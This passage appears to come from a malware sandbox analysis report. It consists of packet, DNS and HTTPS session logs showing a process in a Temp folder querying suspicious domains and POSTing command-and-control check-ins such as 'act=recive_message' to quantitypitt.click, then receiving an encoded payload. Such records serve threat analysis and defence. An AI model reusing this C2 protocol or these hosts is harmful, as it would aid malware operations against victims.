                                                                                                                                                                            Dec 22, 2024 23:29:01.468179941 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.469938040 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.469958067 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.470892906 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.472460985 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.473541021 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.473582983 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.473687887 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.473722935 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.473825932 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.473898888 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.474020958 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474046946 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.474180937 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474205017 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.474349022 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474380970 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.474395990 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474515915 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474548101 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.519334078 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.519553900 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.519606113 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.519620895 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.567337990 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.567528963 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.567598104 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.567626953 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.611381054 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.611510992 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.655349970 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.834641933 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.735188961 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.735332012 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.735405922 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:03.741257906 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:03.741331100 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.786247969 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:03.786371946 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.786609888 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:03.787003040 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:03.787034035 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.112003088 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.112090111 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:05.113836050 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:05.113851070 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.114272118 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.115902901 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:05.115936041 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:05.115998983 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.877598047 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.877832890 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.878002882 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:05.878087044 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:05.878087044 CET49816443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:05.878132105 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.878159046 CET44349816172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:06.373569965 CET49823443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:06.373613119 CET44349823194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:06.373701096 CET49823443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:06.374180079 CET49823443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:06.374192953 CET44349823194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:11.147295952 CET44349823194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:11.147526026 CET49823443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:11.147694111 CET49823443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:11.147761106 CET44349823194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:11.148402929 CET49834443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:11.148458004 CET44349834194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:11.148538113 CET49834443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:11.149008036 CET49834443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:11.149024963 CET44349834194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:15.930136919 CET44349834194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:15.930247068 CET49834443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:15.930304050 CET49834443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:15.930325031 CET44349834194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:15.930905104 CET49845443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:15.930995941 CET44349845194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:15.931098938 CET49845443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:15.935570002 CET49845443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:15.935642004 CET44349845194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:15.935753107 CET49845443192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 22, 2024 23:29:16.321561098 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:16.321583033 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:16.321670055 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:16.322149992 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:16.322159052 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:17.590656042 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:17.590806007 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:17.592938900 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:17.592950106 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:17.593353987 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:17.594911098 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:17.639331102 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:18.041548014 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:18.041698933 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:18.041759014 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:18.041778088 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:18.041862011 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:18.041908979 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:18.041918039 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:18.042068005 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:18.042129993 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:18.042243958 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:18.042259932 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:18.042279005 CET49846443192.168.2.5172.67.191.144
                                                                                                                                                                            Dec 22, 2024 23:29:18.042284012 CET44349846172.67.191.144192.168.2.5
                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Dec 22, 2024 23:28:12.859502077 CET6208453192.168.2.51.1.1.1
                                                                                                                                                                            Dec 22, 2024 23:28:13.074731112 CET53620841.1.1.1192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:43.426893950 CET6534253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 22, 2024 23:28:43.769505024 CET53653421.1.1.1192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:05.879379034 CET6116153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 22, 2024 23:29:06.372596025 CET53611611.1.1.1192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:15.938981056 CET6038153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 22, 2024 23:29:16.320489883 CET53603811.1.1.1192.168.2.5
                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                            Dec 22, 2024 23:28:12.859502077 CET192.168.2.51.1.1.10xc804Standard query (0)qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJvA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 22, 2024 23:28:43.426893950 CET192.168.2.51.1.1.10x4c60Standard query (0)quantitypitt.clickA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 22, 2024 23:29:05.879379034 CET192.168.2.51.1.1.10xa3fcStandard query (0)neqi.shopA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 22, 2024 23:29:15.938981056 CET192.168.2.51.1.1.10x3d30Standard query (0)kliptizq.shopA (IP address)IN (0x0001)false
                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                            Dec 22, 2024 23:28:13.074731112 CET1.1.1.1192.168.2.50xc804Name error (3)qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 22, 2024 23:28:43.769505024 CET1.1.1.1192.168.2.50x4c60No error (0)quantitypitt.click172.67.186.189A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 22, 2024 23:28:43.769505024 CET1.1.1.1192.168.2.50x4c60No error (0)quantitypitt.click104.21.43.229A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 22, 2024 23:29:06.372596025 CET1.1.1.1192.168.2.50xa3fcNo error (0)neqi.shop194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 22, 2024 23:29:16.320489883 CET1.1.1.1192.168.2.50x3d30No error (0)kliptizq.shop172.67.191.144A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 22, 2024 23:29:16.320489883 CET1.1.1.1192.168.2.50x3d30No error (0)kliptizq.shop104.21.84.113A (IP address)IN (0x0001)false
                                                                                                                                                                            • quantitypitt.click
                                                                                                                                                                            • kliptizq.shop
                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.549760172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:28:45 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:28:45 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                            2024-12-22 22:28:45 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:28:45 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=jb4o2q5ddc01bun66h9mqe4qhe; expires=Thu, 17 Apr 2025 16:15:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJhInCsSgCIdJWaPGD1JxQhJQte5wb7pv27yKcIjZjwHdmOnz7S3fD4F1h1Ys5RVJC%2Fgq1ppNseOEZ3i4IPfKM8XFwgqwC5VV7rc92yhrWpXYrb1Vj5a%2FF2FCNZI6kehCb1uIHo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638bf6eafc4337-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1598&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1827284&cwnd=222&unsent_bytes=0&cid=70625105b128e55c&ts=784&x=0"
                                                                                                                                                                            2024-12-22 22:28:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                            2024-12-22 22:28:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.549766172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:28:46 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 78
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:28:46 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--VIKA&j=637b55279021aab33278188cfa638397
                                                                                                                                                                            2024-12-22 22:28:47 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:28:47 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=rjpb2nijjbamsjt16igf08imul; expires=Thu, 17 Apr 2025 16:15:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5UMOqK7TuXbfIyauPcnGkgDge6aMXKGxHQwImReRUWKxQswJDw8Evcd4rRugQmd8oH70XqtWKu%2BAZCYi%2F4Wb9XbWKyMCTPcrk5HRfb8A5pCE4h5STpRSjahOeh%2B%2B6bJI19xhAY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638c0379bc8cc8-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2066&min_rtt=2036&rtt_var=785&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=980&delivery_rate=1434184&cwnd=237&unsent_bytes=0&cid=fc69a4ae957870a5&ts=787&x=0"
                                                                                                                                                                            2024-12-22 22:28:47 UTC238INData Raw: 34 66 34 61 0d 0a 42 72 34 59 59 4e 65 4d 63 78 63 59 76 36 71 4d 68 36 6a 67 44 64 4c 35 76 79 32 32 6b 31 2b 69 45 4d 46 32 45 49 4a 34 4d 7a 5a 39 6e 47 35 43 37 62 68 66 4e 57 76 61 69 4c 62 7a 32 70 56 6f 2f 74 76 65 53 5a 53 70 4f 63 4e 38 73 68 4d 38 6f 41 35 65 46 44 7a 59 65 51 79 6b 36 56 38 31 66 63 65 49 74 74 7a 54 77 6d 69 38 32 34 55 50 30 2f 6b 39 77 33 79 6a 46 33 76 74 43 46 39 56 62 74 4a 2f 43 4c 4c 76 46 33 5a 30 30 73 2f 70 34 73 6d 4b 59 37 75 55 31 30 43 55 76 33 33 48 61 75 4e 4d 4d 73 38 64 52 31 64 4c 33 32 73 4c 39 66 46 66 62 44 72 61 78 4b 36 39 69 6f 46 6f 73 4a 58 5a 53 64 33 37 4e 38 70 30 6f 68 4a 36 38 68 46 56 58 6d 37 63 66 41 6d 34 35 67 4e 37 66 74 58 45 37 2b 6a 4a
                                                                                                                                                                            Data Ascii: 4f4aBr4YYNeMcxcYv6qMh6jgDdL5vy22k1+iEMF2EIJ4MzZ9nG5C7bhfNWvaiLbz2pVo/tveSZSpOcN8shM8oA5eFDzYeQyk6V81fceIttzTwmi824UP0/k9w3yjF3vtCF9VbtJ/CLLvF3Z00s/p4smKY7uU10CUv33HauNMMs8dR1dL32sL9fFfbDraxK69ioFosJXZSd37N8p0ohJ68hFVXm7cfAm45gN7ftXE7+jJ
                                                                                                                                                                            2024-12-22 22:28:47 UTC1369INData Raw: 77 69 48 77 6e 4d 55 50 6a 4c 46 75 38 6e 47 79 42 57 66 74 43 6c 63 55 65 35 4a 6a 51 72 4c 69 55 53 30 36 31 63 54 67 34 4d 6d 4e 61 4c 47 62 7a 30 44 55 38 6a 58 49 64 71 6b 62 66 65 38 55 57 31 4e 73 31 58 30 4e 73 75 59 58 65 6e 6d 64 68 71 37 69 30 73 49 33 38 4c 76 4e 54 4e 66 6c 4d 4e 45 79 76 46 70 72 6f 42 31 64 46 44 79 63 66 41 79 30 34 78 46 6e 63 74 62 44 36 2f 66 42 69 32 4b 39 6d 39 42 46 32 2f 49 39 78 33 69 70 47 33 6a 6b 46 31 78 53 5a 4e 77 36 54 50 58 70 43 54 55 69 6e 65 76 72 39 63 32 4f 65 66 4b 68 6e 56 43 61 36 48 33 48 66 75 4e 4d 4d 75 67 66 55 6c 64 76 30 33 6b 4b 76 76 77 52 5a 33 7a 51 7a 66 7a 6a 7a 34 78 6c 73 34 6e 58 51 64 4c 79 4e 4d 74 37 70 68 4e 32 6f 46 51 52 55 33 79 63 49 6b 4b 55 34 78 70 35 63 4d 72 49 72 76 71
                                                                                                                                                                            Data Ascii: wiHwnMUPjLFu8nGyBWftClcUe5JjQrLiUS061cTg4MmNaLGbz0DU8jXIdqkbfe8UW1Ns1X0NsuYXenmdhq7i0sI38LvNTNflMNEyvFproB1dFDycfAy04xFnctbD6/fBi2K9m9BF2/I9x3ipG3jkF1xSZNw6TPXpCTUinevr9c2OefKhnVCa6H3HfuNMMugfUldv03kKvvwRZ3zQzfzjz4xls4nXQdLyNMt7phN2oFQRU3ycIkKU4xp5cMrIrvq
                                                                                                                                                                            2024-12-22 22:28:47 UTC1369INData Raw: 49 6e 52 52 64 4c 2b 4d 4d 77 79 37 56 52 31 2b 46 6f 4a 46 45 37 66 62 67 47 2f 72 43 52 32 64 4e 50 50 2b 4b 58 56 7a 48 62 77 6e 4e 45 50 6a 4c 45 77 77 58 71 6c 42 6e 33 74 47 56 39 61 61 39 6c 31 43 72 58 75 48 48 42 2b 31 73 50 74 36 4d 36 51 5a 62 43 54 32 45 37 65 2b 33 32 4f 4d 71 51 4d 4d 72 68 61 59 45 4e 76 6e 6b 38 42 75 2b 41 57 59 7a 72 43 68 76 65 6c 7a 59 34 76 36 4e 76 51 52 39 48 30 4d 73 46 34 72 52 46 34 37 42 4a 66 56 33 62 54 66 67 4b 35 35 68 74 34 64 4e 6e 41 35 2b 37 42 68 47 2b 78 6b 5a 30 42 6c 50 59 6c 67 43 72 6a 49 48 58 73 46 31 34 57 55 64 39 30 44 4c 4c 34 55 57 6f 30 78 49 6a 70 36 59 72 61 4c 37 79 53 33 55 54 65 39 54 33 48 66 36 59 58 64 65 4d 58 56 6c 35 71 32 33 34 4f 76 4f 4d 58 64 58 33 5a 7a 66 7a 67 77 34 35 6a
                                                                                                                                                                            Data Ascii: InRRdL+MMwy7VR1+FoJFE7fbgG/rCR2dNPP+KXVzHbwnNEPjLEwwXqlBn3tGV9aa9l1CrXuHHB+1sPt6M6QZbCT2E7e+32OMqQMMrhaYENvnk8Bu+AWYzrChvelzY4v6NvQR9H0MsF4rRF47BJfV3bTfgK55ht4dNnA5+7BhG+xkZ0BlPYlgCrjIHXsF14WUd90DLL4UWo0xIjp6YraL7yS3UTe9T3Hf6YXdeMXVl5q234OvOMXdX3Zzfzgw45j
                                                                                                                                                                            2024-12-22 22:28:47 UTC1369INData Raw: 6d 55 37 6e 50 5a 4d 71 51 59 4d 72 68 61 57 46 31 32 30 6e 51 4c 75 4f 67 5a 63 6e 54 51 77 2b 6a 75 7a 59 56 70 76 5a 50 51 53 74 66 77 4f 63 70 67 6f 42 39 34 37 52 41 52 47 69 54 62 59 6b 4c 74 72 6a 5a 35 55 38 33 54 2f 50 4f 4b 6e 53 47 70 32 39 70 44 6c 4b 6c 39 77 33 32 71 47 33 72 6f 46 56 35 51 61 74 70 38 44 37 44 68 47 32 64 79 30 38 58 6c 36 73 47 51 62 37 32 66 30 55 76 63 2b 6a 65 41 50 4f 4d 54 61 71 42 43 45 57 46 70 30 33 6f 42 6f 36 34 4f 4f 32 4f 64 7a 2b 4b 6c 6b 73 4a 6a 76 70 76 53 51 39 6a 36 4e 63 46 2b 72 52 4e 33 36 52 4a 5a 52 6d 58 59 63 67 4f 37 34 52 42 78 66 39 6a 4d 36 65 48 4d 6a 53 2f 2b 32 39 70 58 6c 4b 6c 39 37 31 57 57 56 6c 50 61 57 6b 34 61 66 5a 78 39 44 76 57 32 55 58 6c 35 30 63 44 68 34 38 4f 4f 5a 62 6d 51 30
                                                                                                                                                                            Data Ascii: mU7nPZMqQYMrhaWF120nQLuOgZcnTQw+juzYVpvZPQStfwOcpgoB947RARGiTbYkLtrjZ5U83T/POKnSGp29pDlKl9w32qG3roFV5Qatp8D7DhG2dy08Xl6sGQb72f0Uvc+jeAPOMTaqBCEWFp03oBo64OO2Odz+KlksJjvpvSQ9j6NcF+rRN36RJZRmXYcgO74RBxf9jM6eHMjS/+29pXlKl971WWVlPaWk4afZx9DvW2UXl50cDh48OOZbmQ0
                                                                                                                                                                            2024-12-22 22:28:47 UTC1369INData Raw: 2b 78 48 65 73 46 58 50 6d 43 46 5a 64 64 74 4a 33 44 62 33 6d 47 48 52 2b 32 4d 58 6f 36 63 43 44 61 4c 36 56 31 51 2b 61 73 54 72 59 4d 76 74 55 55 2f 41 42 51 30 4a 70 2f 58 63 4e 39 66 46 66 62 44 72 61 78 4b 36 39 69 6f 74 39 74 4a 62 50 52 74 50 2f 4d 73 4e 67 6f 68 6c 35 38 68 31 65 55 47 50 51 66 41 32 7a 37 78 52 2f 64 74 72 4e 35 65 72 47 77 69 48 77 6e 4d 55 50 6a 4c 45 54 79 32 47 30 46 33 7a 72 44 45 6f 55 65 35 4a 6a 51 72 4c 69 55 53 30 36 33 73 50 6c 34 63 71 4f 62 37 53 57 33 56 33 62 39 6a 72 4a 65 62 45 65 64 65 63 52 57 56 39 72 32 6d 67 4f 75 2f 77 55 5a 32 69 64 68 71 37 69 30 73 49 33 38 4b 33 61 58 38 54 79 66 2f 46 6b 6f 41 4a 35 37 52 59 52 53 79 72 46 4f 67 57 35 72 6b 6b 31 66 4e 4c 42 37 65 72 4c 69 32 4f 39 6e 74 52 4b 31 66
                                                                                                                                                                            Data Ascii: +xHesFXPmCFZddtJ3Db3mGHR+2MXo6cCDaL6V1Q+asTrYMvtUU/ABQ0Jp/XcN9fFfbDraxK69iot9tJbPRtP/MsNgohl58h1eUGPQfA2z7xR/dtrN5erGwiHwnMUPjLETy2G0F3zrDEoUe5JjQrLiUS063sPl4cqOb7SW3V3b9jrJebEedecRWV9r2mgOu/wUZ2idhq7i0sI38K3aX8Tyf/FkoAJ57RYRSyrFOgW5rkk1fNLB7erLi2O9ntRK1f
                                                                                                                                                                            2024-12-22 22:28:47 UTC1369INData Raw: 6b 52 64 70 6f 41 55 66 54 53 54 62 64 6b 4c 74 72 68 4a 79 65 64 7a 43 35 2b 6e 46 68 57 75 69 6b 64 70 64 31 66 41 32 7a 58 36 6a 47 58 2f 71 47 31 68 5a 61 4e 46 39 42 62 72 72 55 54 73 36 32 74 43 75 76 59 71 6a 59 72 75 58 68 68 57 55 37 6e 50 5a 4d 71 51 59 4d 72 68 61 55 56 35 68 31 6e 63 42 75 75 30 44 64 48 7a 50 79 4f 50 76 32 49 68 6b 74 5a 62 51 51 74 66 33 4f 38 74 2b 73 52 31 79 34 78 45 52 47 69 54 62 59 6b 4c 74 72 6a 4a 69 62 4e 66 50 34 76 50 42 67 32 79 6d 6c 73 30 50 6d 72 45 73 78 32 50 6a 54 47 54 77 44 56 5a 4c 4b 73 55 36 42 62 6d 75 53 54 56 38 31 4d 37 70 34 38 53 51 61 72 61 55 30 6b 62 64 39 54 58 44 63 71 63 51 64 65 55 5a 58 56 39 6a 33 33 55 47 76 4f 41 59 65 6a 71 54 69 4f 6e 39 69 74 6f 76 6b 59 44 65 51 39 6d 78 49 6f 35
